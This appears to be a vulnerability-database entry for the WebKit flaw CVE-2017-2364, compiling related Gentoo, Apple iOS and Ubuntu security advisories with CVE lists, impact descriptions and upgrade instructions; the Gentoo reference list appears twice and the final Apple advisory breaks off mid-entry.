[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards. This issue was addressed through improved input
validation.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2350: Gareth Heyes of Portswigger Web Security
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2355: Team Pangu and lokihardt at PwnFest 2016
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling. This
issue was addressed through improved validation.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked. This
was addressed through improved input validation.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "10.2.1".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0878 | CVE-2017-2364 | Apple iOS and Safari Used in etc. WebKit Vulnerabilities that bypass the same origin policy |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. Apple iOS and Safari Used in etc. WebKit is prone to a security bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions; other attacks are also possible. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in the WebKit component of Apple Safari prior to 10.0.3 and iOS prior to 10.2.1.
===========================================================================
Ubuntu Security Notice USN-3257-1
April 10, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.16.1-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.16.1-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.16.1-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.16.1-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3257-1
CVE-2016-9642, CVE-2016-9643, CVE-2017-2364, CVE-2017-2367,
CVE-2017-2376, CVE-2017-2377, CVE-2017-2386, CVE-2017-2392,
CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405,
CVE-2017-2415, CVE-2017-2419, CVE-2017-2433, CVE-2017-2442,
CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454,
CVE-2017-2455, CVE-2017-2457, CVE-2017-2459, CVE-2017-2460,
CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,
CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2475,
CVE-2017-2476, CVE-2017-2481
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.16.1-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.16.1-0ubuntu0.16.04.1
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attack can use multiple vectors to execute arbitrary code or
cause a denial of service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-03-27-4 iOS 10.3
iOS 10.3 is now available and addresses the following:
Accounts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A user may be able to view an Apple ID from the lock screen
Description: A prompt management issue was addressed by removing
iCloud authentication prompts from the lock screen.
CVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous
researcher
Audio
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2430: an anonymous researcher working with Trend Microas
Zero Day Initiative
CVE-2017-2462: an anonymous researcher working with Trend Microas
Zero Day Initiative
Carbon
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted .dfont file may lead to
arbitrary code execution
Description: A buffer overflow existed in the handling of font files.
This issue was addressed through improved bounds checking.
CVE-2017-2379: John Villamil, Doyensec, riusksk (ae3aY=) of Tencent
Security Platform Department
CoreGraphics
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted image may lead to a denial
of service
Description: An infinite recursion was addressed through improved
state management.
CVE-2017-2417: riusksk (ae3aY=) of Tencent Security Platform
Department
CoreGraphics
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2444: Mei Wang of 360 GearTeam
CoreText
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2435: John Villamil, Doyensec
CoreText
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed through improved
input validation.
CVE-2017-2450: John Villamil, Doyensec
CoreText
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted text message may lead to
application denial of service
Description: A resource exhaustion issue was addressed through
improved input validation.
CVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher
DataAccess
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
